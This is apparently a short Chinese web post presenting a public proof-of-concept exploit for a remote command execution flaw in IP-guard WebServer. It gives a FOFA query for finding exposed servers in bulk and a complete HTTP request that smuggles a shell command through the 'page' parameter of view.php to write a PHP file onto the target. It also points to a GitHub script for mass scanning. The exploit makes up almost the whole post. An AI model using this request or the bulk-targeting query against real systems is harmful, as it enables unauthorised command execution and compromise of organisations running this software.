fofa批量挖洞:”IP-guard” && icon_hash=”2030860561″
公开POC
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"<?php+phpinfo();?>"+>testinfo.php HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1会在/ipg/static/appr/lib/flexpaper/php/下创建testinfo.php文件
github脚本批量扫:
POC/IP-guard WebServer 远程命令执行漏洞.md at main · wy876/POC (github.com)
EXP
发表回复
© 版权声明
THE END
请登录后查看评论内容